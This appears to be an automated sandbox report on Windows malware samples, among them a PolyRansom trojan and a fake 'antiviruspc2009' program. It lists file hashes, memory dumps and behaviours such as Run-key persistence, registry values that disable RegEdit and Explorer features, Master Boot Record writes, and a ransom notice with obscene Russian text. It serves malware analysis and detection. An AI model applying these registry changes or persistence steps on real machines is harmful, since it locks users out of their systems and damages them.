| SHA1 | 9caa5c658b1a88fee149893d3a00b34a8bb8a1a6 |
| SHA256 | 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423 |
| SHA512 | dc3d6e409cee4d54f48d1a25912243d07e2f800578c8e0e348ce515a047ecf5fa3089b46284e0956bbced345957a000eecdc082e6f3060971759d70a14c1c97e |
memory/1012-141-0x0000000000000000-mapping.dmp
memory/1484-144-0x0000000000460000-0x00000000004C8000-memory.dmp
memory/1116-147-0x00000000030C0000-0x00000000030D0000-memory.dmp
memory/1868-151-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1624-152-0x00000000002B0000-0x000000000037E000-memory.dmp
memory/1624-153-0x0000000000400000-0x00000000005DE000-memory.dmp
memory/1012-154-0x0000000000400000-0x0000000000439000-memory.dmp
memory/2000-155-0x0000000000180000-0x00000000001B1000-memory.dmp
memory/2000-157-0x0000000000400000-0x0000000000450000-memory.dmp
memory/1484-156-0x0000000000460000-0x00000000004C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0002dddba512e20c3f82aaab8bad8b4d |
| SHA1 | 493286b108822ba636cc0e53b8259e4f06ecf900 |
| SHA256 | 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7 |
| SHA512 | 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b |
\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
memory/980-161-0x0000000000000000-mapping.dmp
memory/1600-158-0x0000000000000000-mapping.dmp
memory/1688-163-0x0000000000000000-mapping.dmp
memory/320-165-0x0000000000000000-mapping.dmp
memory/584-164-0x0000000000350000-0x000000000037E000-memory.dmp
\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
\Program Files (x86)\antiviruspc2009\pthreadVC2.dll
| MD5 | 0ab7d0e87f3843f8104b3670f5a9af62 |
| SHA1 | 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5 |
| SHA256 | 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b |
| SHA512 | e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375 |
C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll
| MD5 | 0ab7d0e87f3843f8104b3670f5a9af62 |
| SHA1 | 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5 |
| SHA256 | 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b |
| SHA512 | e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375 |
\Program Files (x86)\antiviruspc2009\bzip2.dll
| MD5 | 4143d4973e0f5a5180e114bdd868d4d2 |
| SHA1 | b47fd2cf9db0f37c04e4425085fb953cbce81478 |
| SHA256 | da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76 |
| SHA512 | e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc |
C:\Program Files (x86)\antiviruspc2009\bzip2.dll
| MD5 | 4143d4973e0f5a5180e114bdd868d4d2 |
| SHA1 | b47fd2cf9db0f37c04e4425085fb953cbce81478 |
| SHA256 | da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76 |
| SHA512 | e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc |
\Program Files (x86)\antiviruspc2009\libltdl3.dll
| MD5 | 00a71b4afda8033235432b1c433fecc7 |
| SHA1 | d7b0c218aa8fec1c60ada26a09d9e0d9601985ca |
| SHA256 | f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd |
| SHA512 | 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a |
C:\Program Files (x86)\antiviruspc2009\libltdl3.dll
| MD5 | 00a71b4afda8033235432b1c433fecc7 |
| SHA1 | d7b0c218aa8fec1c60ada26a09d9e0d9601985ca |
| SHA256 | f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd |
| SHA512 | 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 02f471d1fefbdc07af5555dbfd6ea918 |
| SHA1 | 2a8f93dd21628933de8bea4a9abc00dbb215df0b |
| SHA256 | 36619636d511fd4b77d3c1052067f5f2a514f7f31dfaa6b2e5677fbb61fd8cba |
| SHA512 | 287b57b5d318764b2e92ec387099e7e313ba404b73db64d21102ba8656636abbf52bb345328fe58084dc70414c9e2d8cd46abd5a463c6d771d9c3ba68759a559 |
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
| MD5 | c18a7323332b3292a8e0f1c81df65698 |
| SHA1 | bcb8f34cbe0137e888d06acbcb6508417851a087 |
| SHA256 | 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8 |
| SHA512 | 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad |
memory/1692-176-0x0000000001000000-0x00000000010CE000-memory.dmp
memory/320-177-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/1012-178-0x0000000001C90000-0x0000000001CC2000-memory.dmp
C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0315c3149c7dc1d865dc5a89043d870d |
| SHA1 | f74546dda99891ca688416b1a61c9637b3794108 |
| SHA256 | 90c2c3944fa8933eefc699cf590ed836086deb31ee56ec71b5651fd978a352c9 |
| SHA512 | 7168dc244f0e400fa302801078e3faec8cdd2d3cb3b8baaab0a1b3c0929d7cf41e54bfbe530ad5ce96a6b63761f7866d26aaae788c3138c34294174091478112 |
memory/904-181-0x0000000000000000-mapping.dmp
\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
\Users\Admin\qiUYEYUk\vQkIcwYI.exe
| MD5 | 72723b53808ffa17ef9478bfa115b39c |
| SHA1 | f3e3084cb9a087436f441da608fed0ff64cdfa80 |
| SHA256 | e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697 |
| SHA512 | 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1 |
memory/288-179-0x0000000000000000-mapping.dmp
memory/1496-188-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1464-187-0x0000000000000000-mapping.dmp
memory/1496-191-0x0000000000230000-0x0000000000242000-memory.dmp
memory/1864-190-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | e1b69c058131e1593eccd4fbcdbb72b2 |
| SHA1 | 6d319439cac072547edd7cf2019855fa25092006 |
| SHA256 | b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f |
| SHA512 | 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c |
C:\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
memory/1012-194-0x0000000001C90000-0x0000000001CC2000-memory.dmp
memory/1496-197-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1012-196-0x0000000001C90000-0x0000000001CBE000-memory.dmp
memory/904-195-0x0000000000400000-0x0000000000432000-memory.dmp
\ProgramData\IIwkMYAg\wqccYwoU.exe
| MD5 | 80ad3217c194a873f0ad7eaf40702b0b |
| SHA1 | ebca8d01b9b7c947a3623a8736b7c9b8182d89a1 |
| SHA256 | 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3 |
| SHA512 | cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea |
memory/472-185-0x0000000000000000-mapping.dmp
memory/1352-199-0x0000000000020000-0x00000000000A2000-memory.dmp
memory/548-198-0x00000000003A0000-0x0000000000592000-memory.dmp
memory/780-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | d0deb2644c9435ea701e88537787ea6e |
| SHA1 | 866e47ecd80da89c4f56557659027a3aee897132 |
| SHA256 | ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3 |
| SHA512 | 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf |
memory/2036-202-0x0000000000000000-mapping.dmp
memory/960-201-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | d5e5853f5a2a5a7413f26c625c0e240b |
| SHA1 | 0ced68483e7f3742a963f2507937bb7089de3ffe |
| SHA256 | 415dd13c421a27ed96bf81579b112fbac05862405e9964e24ec8e9d4611d25f3 |
| SHA512 | 49ea9ab92ce5832e702fac6f56a7f7168f60d8271419460ed27970c4a0400e996c2ea097636fc145e355c4df5cfbf200b7bf3c691133f72e4cad228f570b91e4 |
memory/2036-206-0x00000000013D0000-0x000000000150B000-memory.dmp
memory/1012-207-0x0000000001C90000-0x0000000001CBE000-memory.dmp
memory/1864-208-0x0000000000400000-0x000000000042E000-memory.dmp
memory/1496-209-0x0000000000400000-0x000000000043F000-memory.dmp
memory/2108-212-0x0000000000000000-mapping.dmp
C:\Windows\9DB7.tmp
| MD5 | 347ac3b6b791054de3e5720a7144a977 |
| SHA1 | 413eba3973a15c1a6429d9f170f3e8287f98c21c |
| SHA256 | 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c |
| SHA512 | 9a399916bc681964af1e1061bc0a8e2926307642557539ad587ce6f9b5ef93bdf1820fe5d7b5ffe5f0bb38e5b4dc6add213ba04048c0c7c264646375fcd01787 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 7dde6427dcf06d0c861693b96ad053a0 |
| SHA1 | 086008ecfe06ad06f4c0eee2b13530897146ae01 |
| SHA256 | 077c04ee44667c5e1024652a7bbe7fff81360ef128245ffd4cd843b7a56227cf |
| SHA512 | 8cf162f83ebfa2f3db54b10d5b0e6af590e97596ac2d469058a98340bf27de2866e679c777aa46dd530db44c27503d4cea8c34d96cb83b71477a806b5ab7c1b9 |
memory/2116-214-0x0000000000000000-mapping.dmp
memory/2060-210-0x0000000000000000-mapping.dmp
memory/2184-221-0x0000000000000000-mapping.dmp
memory/1496-222-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1600-225-0x0000000000400000-0x0000000000415000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 0002dddba512e20c3f82aaab8bad8b4d |
| SHA1 | 493286b108822ba636cc0e53b8259e4f06ecf900 |
| SHA256 | 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7 |
| SHA512 | 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b |
memory/2224-228-0x0000000000000000-mapping.dmp
memory/2252-230-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8cd7c19b6dc76c116cdb84e369fd5d9a |
| SHA1 | 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc |
| SHA256 | 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645 |
| SHA512 | 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8cd7c19b6dc76c116cdb84e369fd5d9a |
| SHA1 | 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc |
| SHA256 | 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645 |
| SHA512 | 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 03baeba6b4224371cca7fa6f95ae61c0 |
| SHA1 | 8731202d2f954421a37b5c9e01d971131bd515f1 |
| SHA256 | 61a9e3278b6bcc29a2a0405b06fb2a3bbcb1751c3dd564a8f94cc89ea957ec35 |
| SHA512 | 386643b0a52b6b1a53e81a8500d040b6415e532ebaffd1be8d1afd4ccb10f6c0342cf734b688ec803b960339284c8d9669e638b1648d9cc734cf7367659c7fd0 |
memory/2176-220-0x0000000000000000-mapping.dmp
memory/2316-237-0x0000000000000000-mapping.dmp
memory/2340-239-0x0000000000000000-mapping.dmp
memory/1600-240-0x0000000000400000-0x0000000000415000-memory.dmp
memory/2252-241-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 8803d517ac24b157431d8a462302b400 |
| SHA1 | b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e |
| SHA256 | 418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786 |
| SHA512 | 38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50 |
memory/320-242-0x0000000000400000-0x0000000000CFB000-memory.dmp
memory/2284-235-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | e1b69c058131e1593eccd4fbcdbb72b2 |
| SHA1 | 6d319439cac072547edd7cf2019855fa25092006 |
| SHA256 | b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f |
| SHA512 | 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-29 12:38
Reported
2022-09-29 12:40
Platform
win10v2004-20220812-en
Max time kernel
43s
Max time network
156s
Command Line
Signatures
Checks for common network interception software
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Для того чтобы восстановить нормальную работу своего компьютера не потеряв ВСЮ информацию! И с экономив деньги, пришли мне на e-mail [email protected] код пополнения счета киевстар на 25 гривень. В ответ в течение двенадцати часов на свой e-mail ты получишь фаил для удаления этой программы." | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\AnVi\splash.mp3 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| File created | C:\Program Files (x86)\AnVi\virus.mp3 | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\WINDOWS\Web | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ХУЙ" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: МОЙ ХУЙ ПРОТУХ А ПИЗДА ГНИЕТ ::::::::::::::::::" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: МОЙ ХУЙ ПРОТУХ А ПИЗДА ГНИЕТ ::::::::::::::::::" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
